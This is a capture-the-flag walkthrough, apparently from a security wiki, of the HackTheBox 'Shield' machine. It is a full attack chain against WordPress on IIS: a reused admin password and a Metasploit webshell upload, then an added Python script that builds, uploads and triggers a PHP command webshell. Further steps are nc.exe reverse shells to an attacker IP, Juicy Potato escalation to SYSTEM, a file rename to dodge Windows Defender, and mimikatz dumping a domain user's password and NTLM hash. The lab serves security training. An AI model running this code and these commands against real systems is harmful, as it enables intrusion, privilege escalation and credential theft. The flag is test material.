HackTheBox-StartingPoint-Shield

From aldeid

Shield


Note: this Starting Point machine only has a root.txt flag (there is no user.txt).

Enumeration

Nmap

We begin by running an Nmap scan.

PORT     STATE SERVICE VERSION
80/tcp   open  http    Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
3306/tcp open  mysql   MySQL (unauthorized)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

The Nmap output shows IIS (Internet Information Services, Microsoft's web server) and MySQL on their default ports. The MySQL line reads "unauthorized" because the server refused Nmap's probe (our host is not allowed to connect), so the port is open but the version could not be fingerprinted and the database is not reachable from our address. Nmap flags TRACE as potentially risky because the method echoes request headers back to the client (cross-site tracing); it plays no role in this box.

Let’s navigate to port 80 using a browser.

[Screenshot: default "IIS Windows Server" start page on http://10.10.10.29]

We see the default IIS starting page.

GoBuster

Let’s use GoBuster to scan for any sub-directories or files that are hosted on the server.

$ gobuster dir -u http://10.10.10.29 -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.10.29
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirb/common.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/06/13 10:56:33 Starting gobuster
===============================================================
/wordpress (Status: 301)
===============================================================
2020/06/13 10:56:52 Finished
===============================================================

The scan reveals a folder named wordpress. Let’s navigate to it (http://10.10.10.29/wordpress).

Foothold

WordPress

WordPress is a Content Management System (CMS) that can be used to quickly create websites and blogs. Since we have already acquired the password P@s5w0rd! on an earlier Starting Point machine, we can try it against the WordPress login at http://10.10.10.29/wordpress/wp-login.php and guess the username. Common candidates are admin and administrator; WordPress makes the guess easy because its login error distinguishes an unknown username from a wrong password for an existing one, so a valid username can be confirmed before the password is tried. The combination admin:P@s5w0rd! is successful and we gain administrative access to the site.

This administrative access can be turned into code execution with the Metasploit module exploit/unix/webapp/wp_admin_shell_upload. The module logs in, uploads a generated plugin zip containing a PHP payload through the admin plugin installer, and then requests the dropped file. Despite its unix/ path it works here because the payload is PHP, executed by the PHP handler IIS uses for WordPress. The result is a meterpreter session on the system.

$ msfconsole -q
msf5 > use exploit/unix/webapp/wp_admin_shell_upload
msf5 exploit(unix/webapp/wp_admin_shell_upload) > show options

Module options (exploit/unix/webapp/wp_admin_shell_upload):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   PASSWORD                    yes       The WordPress password to authenticate with
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      80               yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       The base path to the wordpress application
   USERNAME                    yes       The WordPress username to authenticate with
   VHOST                       no        HTTP server virtual host


Exploit target:

   Id  Name
   --  ----
   0   WordPress


msf5 exploit(unix/webapp/wp_admin_shell_upload) > set rhost 10.10.10.29
rhost => 10.10.10.29
msf5 exploit(unix/webapp/wp_admin_shell_upload) > set targeturi /wordpress
targeturi => /wordpress
msf5 exploit(unix/webapp/wp_admin_shell_upload) > set username admin
username => admin
msf5 exploit(unix/webapp/wp_admin_shell_upload) > set password P@s5w0rd!
password => P@s5w0rd!
msf5 exploit(unix/webapp/wp_admin_shell_upload) > run

[*] Started reverse TCP handler on 10.10.14.195:4444 
[*] Authenticating with WordPress using admin:P@s5w0rd!...
[+] Authenticated with WordPress
[*] Preparing payload...
[*] Uploading payload...
[*] Executing the payload at /wordpress/wp-content/plugins/NvTkksXtvl/ujwUshaaSs.php...
[*] Sending stage (38288 bytes) to 10.10.10.29
[*] Meterpreter session 1 opened (10.10.14.195:4444 -> 10.10.10.29:49717) at 2020-06-13 11:20:52 +0200
[!] This exploit may require manual cleanup of 'ujwUshaaSs.php' on the target
[!] This exploit may require manual cleanup of 'NvTkksXtvl.php' on the target
[!] This exploit may require manual cleanup of '../NvTkksXtvl' on the target
[+] Deleted ujwUshaaSs.php
[+] Deleted NvTkksXtvl.php

meterpreter > 
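
To make the module's three steps concrete, the following is an added example (not code from this page or from Metasploit) that reproduces them by hand: it builds the plugin zip WordPress will accept, extracts the plugin-upload nonce from the admin page, installs the archive through update.php?action=upload-plugin and then requests the dropped PHP file. The base URL, credentials and plugin/file names are caller-supplied assumptions; the names used in the check mirror the random ones in the module output above.

```python
"""Manual equivalent of what exploit/unix/webapp/wp_admin_shell_upload does.
Added example, not code from this page or from Metasploit. The target base
URL, the WordPress credentials and the plugin/file names are assumptions
supplied by the caller.
"""
import io
import re
import zipfile

# Dropped PHP. WordPress only requires the "Plugin Name:" header comment to
# accept the archive; the body runs whatever arrives in ?cmd=.
PHP_WEBSHELL = """<?php
/*
Plugin Name: {name}
*/
if (isset($_GET['cmd'])) {{ system($_GET['cmd']); }}
"""


def build_plugin_zip(plugin_dir: str, php_name: str) -> bytes:
    """Return a zip with the single entry <plugin_dir>/<php_name>.php.

    WordPress unpacks it below wp-content/plugins/, so the file becomes
    /wp-content/plugins/<plugin_dir>/<php_name>.php, the same layout the
    Metasploit run above shows.
    """
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr(f"{plugin_dir}/{php_name}.php",
                    PHP_WEBSHELL.format(name=plugin_dir))
    return buf.getvalue()


def zip_entries(data: bytes) -> dict:
    """Sanity check before upload: entry name -> decoded content."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        return {n: zf.read(n).decode() for n in zf.namelist()}


# wp_nonce_field('plugin-upload') renders this hidden input on the upload tab.
NONCE_RE = re.compile(r'id="_wpnonce"\s+name="_wpnonce"\s+value="([^"]+)"')


def extract_upload_nonce(html: str) -> str:
    """Pull the plugin-upload nonce out of plugin-install.php?tab=upload."""
    m = NONCE_RE.search(html)
    if not m:
        raise ValueError("no _wpnonce in upload form: login probably failed")
    return m.group(1)


def upload_and_trigger(base, user, password, plugin_dir, php_name, cmd="whoami"):
    """Log in, install the plugin zip, then request the dropped PHP.

    base is e.g. http://10.10.10.29/wordpress (the module's TARGETURI).
    Requires the requests package; imported lazily so the offline helpers
    above work without it.
    """
    import requests
    s = requests.Session()
    s.post(f"{base}/wp-login.php", data={
        "log": user, "pwd": password, "wp-submit": "Log In",
        "redirect_to": f"{base}/wp-admin/", "testcookie": "1"})
    nonce = extract_upload_nonce(
        s.get(f"{base}/wp-admin/plugin-install.php?tab=upload").text)
    s.post(f"{base}/wp-admin/update.php?action=upload-plugin",
           data={"_wpnonce": nonce,
                 "_wp_http_referer": "/wp-admin/plugin-install.php?tab=upload",
                 "install-plugin-submit": "Install Now"},
           files={"pluginzip": (f"{plugin_dir}.zip",
                                build_plugin_zip(plugin_dir, php_name),
                                "application/zip")})
    # Cleanup is on you: the PHP file and the plugin directory stay behind.
    return s.get(f"{base}/wp-content/plugins/{plugin_dir}/{php_name}.php",
                 params={"cmd": cmd}).text
```

The offline helpers (build_plugin_zip, zip_entries, extract_upload_nonce) run anywhere; upload_and_trigger is the live path and leaves the same artefacts the module warns about, so the plugin directory has to be removed by hand afterwards.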

The php/windows Meterpreter is easy to lose, so a netcat binary is uploaded to the machine for a more stable shell. Note that the module deleted its two PHP files but not the plugin directory NvTkksXtvl (the third warning above); remove it by hand when done.

Netcat

On your machine, download nc.exe:

$ cd ~/Downloads/
$ wget https://eternallybored.org/misc/netcat/netcat-win32-1.11.zip
$ unzip netcat-win32-1.11.zip
$ cp netcat-1.11/nc.exe .

Now, back to the meterpreter, let’s use the following commands:

meterpreter > lcd /home/unknown/Downloads

lcd stands for “Local Change Directory”, which we use to navigate to the local folder where nc.exe is located.

meterpreter > cd C:/inetpub/wwwroot/wordpress/wp-content/uploads
meterpreter > upload nc.exe
[*] uploading  : nc.exe -> nc.exe
[*] Uploaded -1.00 B of 35.67 KiB (-0.0%): nc.exe -> nc.exe
[*] uploaded   : nc.exe -> nc.exe

The uploads directory (C:/inetpub/wwwroot/wordpress/wp-content/uploads) was chosen because WordPress needs it writable by the IIS worker process for media uploads, so our account can drop files there. Now start a netcat listener on your machine:

$ rlwrap nc -nlvp 1234
listening on [any] 1234 ...

Next, we can execute the following command in the meterpreter session to get a netcat shell:

meterpreter > execute -f nc.exe -a "-e cmd.exe 10.10.14.195 1234"
Process 3248 created.

Privilege Escalation

Running sysinfo in the meterpreter session shows Windows Server 2016 (build 14393). The session is a php/windows Meterpreter, so we are running as the IIS application pool identity, a service account. Service accounts of this kind normally hold SeImpersonatePrivilege, and Server 2016 predates the DCOM hardening introduced with Windows 10 1809 / Server 2019, so the Potato family of token-impersonation exploits (Rotten Potato and its successor Juicy Potato) applies. Confirm the privilege with whoami /priv in the netcat shell before going further.

meterpreter > sysinfo 
Computer    : SHIELD
OS          : Windows NT SHIELD 10.0 build 14393 (Windows Server 2016) i586
Meterpreter : php/windows

Juicy Potato

Juicy Potato is a successor of Rotten Potato. Rotten Potato coerced the BITS service into authenticating to a listener under the attacker's control; Juicy Potato generalises this to any out-of-process DCOM server that runs as SYSTEM, selected by CLSID. The tool tricks that server into connecting to a listener on a local port (the -l argument), captures the NTLM authentication the server performs as SYSTEM, turns it into a SYSTEM token, and then uses SeImpersonatePrivilege (CreateProcessWithTokenW) or SeAssignPrimaryTokenPrivilege (CreateProcessAsUser) to launch a chosen program with that token. It is a local man-in-the-middle of the DCOM activation, not a remote attack, and it lets service accounts escalate to SYSTEM (the highest privilege).
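
Before uploading the binary it is worth checking the precondition in code. The following is an added example (not part of this page or of the JuicyPotato project) that parses whoami /priv output and decides whether a Potato-style escalation is applicable. The SAMPLE_WHOAMI_PRIV text is constructed to resemble an IIS application pool identity, not captured from the box, and the build-number cutoff 17763 (Windows 10 1809 / Server 2019) is where the original technique stops working.

```python
"""Decide whether a Potato-style escalation is worth attempting from the
current token. Added example, not part of the page or the JuicyPotato
project. On the target, run `whoami /priv` in the netcat shell and feed the
real output to potato_applicable() together with the build from sysinfo.
"""
import re

# Constructed sample of `whoami /priv` output for an IIS application pool
# identity (not captured from the box).
SAMPLE_WHOAMI_PRIV = """
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeAuditPrivilege              Generate security audits                  Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
"""

# Either privilege is enough: the exploit obtains a SYSTEM token from the
# coerced DCOM/NTLM handshake and then needs a way to put that token on a
# new process.
POTATO_PRIVS = {"SeImpersonatePrivilege", "SeAssignPrimaryTokenPrivilege"}

# Build where the DCOM OXID resolver hardening landed (Win10 1809 / Server 2019).
HARDENED_BUILD = 17763

ROW_RE = re.compile(r"^(Se\w+Privilege)\s+.*?\s+(Enabled|Disabled)\s*$")


def token_privileges(output: str) -> dict:
    """Map privilege name -> True if Enabled, parsed from whoami /priv text."""
    privs = {}
    for line in output.splitlines():
        m = ROW_RE.match(line.strip())
        if m:
            privs[m.group(1)] = m.group(2) == "Enabled"
    return privs


def potato_candidates(privs: dict) -> list:
    """Return the Potato-relevant privileges held by the token.

    A privilege that is present but Disabled still counts: JuicyPotato
    enables it itself (AdjustTokenPrivileges) before use, so "held" is what
    matters, not "Enabled".
    """
    return sorted(p for p in POTATO_PRIVS if p in privs)


def potato_applicable(output: str, build: int) -> bool:
    """True when the token holds a usable privilege and the OS build predates
    the hardening that broke the original JuicyPotato technique."""
    held = potato_candidates(token_privileges(output))
    return bool(held) and build < HARDENED_BUILD


if __name__ == "__main__":
    privs = token_privileges(SAMPLE_WHOAMI_PRIV)
    print("held:", potato_candidates(privs))
    print("applicable on build 14393:", potato_applicable(SAMPLE_WHOAMI_PRIV, 14393))
```

If potato_applicable() returns False because the privilege is missing, the service account has been hardened and a different escalation path is needed; if it is False because of the build, newer Potato variants that do not rely on the OXID resolver trick are the next thing to look at.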

We can exploit this by uploading the Juicy Potato binary and executing it.

As before, we can use our meterpreter shell to do the upload and then we can use the netcat shell to execute the exploit.

meterpreter > lcd /home/username/Downloads
meterpreter > upload JuicyPotato.exe
[*] uploading  : JuicyPotato.exe -> JuicyPotato.exe
[*] Uploaded -1.00 B of 3.76 MiB (0.0%): JuicyPotato.exe -> JuicyPotato.exe
[*] uploaded   : JuicyPotato.exe -> JuicyPotato.exe

Note: the JuicyPotato executable is renamed here because Windows Defender on the target flagged it under its original name. Renaming only helps against detections keyed on the file name; a content-based signature will still catch the binary.

meterpreter > mv JuicyPotato.exe js.exe

We can create a batch file that JuicyPotato will run as SYSTEM (its -p argument). It starts a second nc reverse shell, this time to port 1111. Write shell.bat from the first reverse shell (port 1234) and replace the IP with yours:

C:\inetpub\wwwroot\wordpress\wp-content\uploads>echo START C:\inetpub\wwwroot\wordpress\wp-content\uploads\nc.exe -e powershell.exe 10.10.14.195 1111 > shell.bat

Let’s start another netcat listener:

$ rlwrap nc -nlvp 1111

Next, we launch JuicyPotato from the first reverse shell (port 1234). -t * lets it try both CreateProcessWithTokenW and CreateProcessAsUser, -p is the program to run as SYSTEM and -l is the local port for its COM listener (any free port works). No -c is given, so the default CLSID, which is the BITS service, is used:

C:\inetpub\wwwroot\wordpress\wp-content\uploads>js.exe -t * -p C:\inetpub\wwwroot\wordpress\wp-content\uploads\shell.bat -l 1337
js.exe -t * -p C:\inetpub\wwwroot\wordpress\wp-content\uploads\shell.bat -l 1337
Testing {4991d34b-80a1-4291-83b6-3328366b9097} 1337
......
[+] authresult 0
{4991d34b-80a1-4291-83b6-3328366b9097};NT AUTHORITY\SYSTEM

[+] CreateProcessWithTokenW OK

C:\inetpub\wwwroot\wordpress\wp-content\uploads>

Note: if the default CLSID fails, try another one with -c, for example -c {bb6df56b-cace-11dc-9992-0019b93a3a84}. The CLSID must belong to an out-of-process COM server that runs as SYSTEM on this exact Windows build; the JuicyPotato repository publishes tested lists per OS version.

The root flag is located in C:\Users\Administrator\Desktop.

$ rlwrap nc -nlvp 1111
listening on [any] 1111 ...
connect to [10.10.14.195] from (UNKNOWN) [10.10.10.29] 49802
Windows PowerShell 
Copyright (C) 2016 Microsoft Corporation. All rights reserved.

PS C:\Windows\system32> whoami
whoami
nt authority\system
PS C:\Windows\system32> more \users\administrator\desktop\root.txt
more \users\administrator\desktop\root.txt
6e9a9fdc6f64e410a68b847bb4b404fa

PS C:\Windows\system32> 

Root flag: 6e9a9fdc6f64e410a68b847bb4b404fa

Post Exploitation

Mimikatz can be used to dump the credentials that LSASS keeps in memory for logged-on sessions. Reading LSASS needs SYSTEM (or SeDebugPrivilege), so the binary is uploaded through the meterpreter session but executed from the SYSTEM PowerShell shell on port 1111:

meterpreter > upload mimikatz.exe
[*] uploading  : mimikatz.exe -> mimikatz.exe
[*] Uploaded -1.00 B of 984.76 KiB (0.0%): mimikatz.exe -> mimikatz.exe
[*] uploaded   : mimikatz.exe -> mimikatz.exe

We run mimikatz and use sekurlsa::logonpasswords to list the credential material of every logon session:

PS C:\inetpub\wwwroot\wordpress\wp-content\uploads> ./mimikatz.exe
./mimikatz.exe

  .#####.   mimikatz 2.2.0 (x64) #19041 May 19 2020 00:48:59
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > http://pingcastle.com / http://mysmartlogon.com   ***/

mimikatz # sekurlsa::logonpasswords

[REDACTED]

Authentication Id : 0 ; 305742 (00000000:0004aa4e)
Session           : Interactive from 1
User Name         : sandra
Domain            : MEGACORP
Logon Server      : PATHFINDER
Logon Time        : 6/13/2020 9:12:22 AM
SID               : S-1-5-21-1035856440-4137329016-3276773158-1105
    msv :   
     [00000003] Primary
     * Username : sandra
     * Domain   : MEGACORP
     * NTLM     : 29ab86c5c4d2aab957763e5c1720486d
     * SHA1     : 8bd0ccc2a23892a74dfbbbb57f0faa9721562a38
     * DPAPI    : f4c73b3f07c4f309ebf086644254bcbc
    tspkg : 
    wdigest :   
     * Username : sandra
     * Domain   : MEGACORP
     * Password : (null)
    kerberos :  
     * Username : sandra
     * Domain   : MEGACORP.LOCAL
     * Password : Password1234!
    ssp :   
    credman :   

[REDACTED]

And we find the password Password1234! for the domain user sandra (domain MEGACORP, authenticated by the domain controller PATHFINDER). The msv block also gives her NTLM hash, which is usable for pass-the-hash even when no cleartext is cached; wdigest shows (null) because Windows Server 2016 no longer stores cleartext in WDigest by default, and only the kerberos provider still holds the password here. Domain credentials like these are the natural pivot to the rest of the MEGACORP environment.